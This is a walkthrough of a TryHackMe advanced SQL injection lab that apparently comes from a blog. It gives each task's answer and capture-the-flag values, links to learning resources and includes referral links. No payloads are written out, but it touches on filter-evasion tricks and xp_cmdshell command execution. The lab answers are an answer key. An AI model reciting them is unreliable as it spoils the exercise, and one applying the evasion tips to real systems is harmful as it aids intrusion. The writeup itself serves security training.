avatarembossdotar

Summary

The website content provides a comprehensive walkthrough for advanced SQL injection techniques, including practical examples, flags, and additional resources for further learning, as part of a TryHackMe room.

Abstract

The provided text is a detailed writeup of an advanced SQL injection room on TryHackMe, a popular cybersecurity learning platform. It covers various SQL injection methods such as in-band, out-of-band, error-based, union-based, boolean-based blind, and time-based blind SQL injection, as well as second-order SQL injection and filter evasion techniques. The writeup includes step-by-step guidance through tasks, questions, and answers, along with flags to be captured for successful completion. It also offers tips for tackling challenging tasks, emphasizes the importance of understanding the tools and concepts, and provides additional resources for a deeper dive into the topics. The room is free, but the author encourages users to consider premium access for more benefits and includes their referral link for discounts.

Opinions

  • The author believes in the value of hands-on practice, encouraging readers to attempt tasks on their own.
  • They suggest taking time to understand tools and concepts rather than rushing through tasks, indicating a preference for quality learning.
  • The inclusion of a referral link suggests the author values mutual benefits and community support, as users can earn credit through referrals.
  • By providing a mix of explanations, examples, and external resources, the author conveys a commitment to comprehensive education in cybersecurity.
  • The author's enthusiasm for the subject is evident, as they encourage readers to engage with the material and enjoy the learning process.

TryHackMe — Advanced SQL Injection — Writeup

Key points: SQLi | SQL injection | In-band SQLi | Out-of-band SQLi | Inferential SQLi | Error-Based SQLi | Union-Based SQLi | Boolean-Based Blind SQLi | Time-Based Blind SQLi | Second-order SQL injection | Filter evasion | Out-of-band SQL Injection | Automation techniques | Mitigation | Nmap | sqlmap. Advanced SQL Injection by awesome TryHackMe! 🎉

Hi All. First, quick introduction. Mentioned Room is of the Free type. It’s worth considering being a premium user, more info here: https://tryhackme.com/why-subscribe

My referral link 🎁 (“When someone uses your referral link to sign up for a premium membership within 7 days, you both earn $5 credit towards premium access!”): https://tryhackme.com/signup?referrer=655bf0dd7cb6fa588c31d1a3 “It’s a win-win for you and your friends!” 🚀

It would be great for you to be more familiar with these topics, so please visit the Room https://tryhackme.com/r/room/advancedsqlinjection to get more details. ✨ I encourage you to do the tasks on your own.

These tasks are well-prepared, so I will try to not repeat the content. You have there what you need, but I want to share some additional helpful and useful resources.

Tip: if you stuck with some task — please take your time, don’t be in hurry. Let’s be a more familiar with mentioned tools, make steps again etc.

Task 1 — Introduction

nmap result, source: THM — Advanced SQL Injection

Q: What is the port on which MySQL service is running? A: 3306

Get ready! 🚀

Additional sources: https://www.mysql.com https://dev.mysql.com/doc/mysql-port-reference/en/mysql-port-reference-tables.html https://capec.mitre.org/data/definitions/66.html https://cwe.mitre.org/data/definitions/89.html

Task 2 — Quick Recap

Q: What type of SQL injection uses the same communication channel for both the injection and data retrieval? A: In-band

Q: In out-of-band SQL injection, which protocol is usually used to send query results to the attacker’s server? A: HTTP

Additional sources: https://www.geeksforgeeks.org/types-of-sql-injection-sqli/ https://owasp.org/www-community/attacks/SQL_Injection https://owasp.org/www-community/attacks/SQL_Injection_Bypassing_WAF

Task 3 — Second-Order SQL Injection

Flag, source: THM — Advanced SQL Injection

🚩 Flag

Q: What is the flag value after updating the title of all books to “compromised”? A: THM{SO_HACKED}

🚩 Flag

Q: What is the flag value once you drop the table hello from the database? A: THM{Table_Dropped}

Additional sources: https://portswigger.net/kb/issues/00100210_sql-injection-second-order

Task 4 — Filter Evasion Techniques

Q: What is the MySQL error code once an invalid query is entered with bad characters? A: 1064

Q: What is the name of the book where book ID=6? A: Animal Series

Additional sources: https://portswigger.net/support/sql-injection-bypassing-common-filters

Task 5 — Filter Evasion Techniques (continued)

Q: What is the password for the username “attacker”? A: tesla

Q: Which of the following can be used if the SELECT keyword is banned? Write the correct option only. a) SElect b) SeLect c) Both a and b d) We cannot bypass SELECT keyword filter A: c

Task 6 — Out-of-band SQL Injection

Q: What is the output of the @@version on the MySQL server? A: 10.4.24-MariaDB

Q: What is the value of @@basedir variable? A: C:/xampp/mysql

Additional sources: https://www.invicti.com/learn/out-of-band-sql-injection-oob-sqli/ https://www.akamai.com/glossary/what-is-dns-data-exfiltration

Task 7 — Other Techniques

🚩 Flag

Q: What is the value of the flag field in the books table where book_id =1? A: THM{HELLO}

Q: What field is detected on the server side when extracting the user agent? A: User-Agent

Additional sources: https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/17-Testing_for_Host_Header_Injection https://portswigger.net/web-security/host-header https://en.wikipedia.org/wiki/HTTP_header_injection https://portswigger.net/web-security/host-header/exploiting https://portswigger.net/kb/issues/00100700_xml-injection https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/07-Testing_for_XML_Injection https://www.invicti.com/learn/json-injection/

Task 8 — Automation

Q: Does the dynamic nature of SQL queries assist a pentester in identifying SQL injection (yea/nay)? A: Nay

Additional sources: https://nmap.org/ https://github.com/nmap/ https://sqlmap.org/ https://github.com/sqlmapproject/sqlmap https://github.com/xxgrunge/sqlninja https://github.com/43622283/jsql-injection https://github.com/CiscoCXSecurity/bbqsql

Task 9 — Best Practices

Q: What command does MSSQL support to execute system commands? A: xp_cmdshell

Additional sources: https://owasp.org/www-project-code-review-guide/ https://cheatsheetseries.owasp.org/cheatsheets/Query_Parameterization_Cheat_Sheet.html https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html

If you want to support my work, you can also take a look here: https://referral.hackthebox.com/mz824lPHTB, thanks!

I hope you enjoy! 🍀

#SQLi #SQLinjection #In-bandSQLi #Out-of-bandSQLi #InferentialSQLi #Error-BasedSQLi #Union-BasedSQLi #Boolean-BasedBlindSQLi #Time-BasedBlindSQLi #Second-orderSQLinjection #FilterEvasion #Out-of-bandSQLinjection #AutomationTechniques #Mitigation #Nmap #sqlmap #writeup #hacking #ITsecurity #THM #TryHackMe

Best wishes,

Tryhackme
Tryhackme Walkthrough
Tryhackme Writeup
Cybersecurity
Cybersecurity Awareness
Recommended from ReadMedium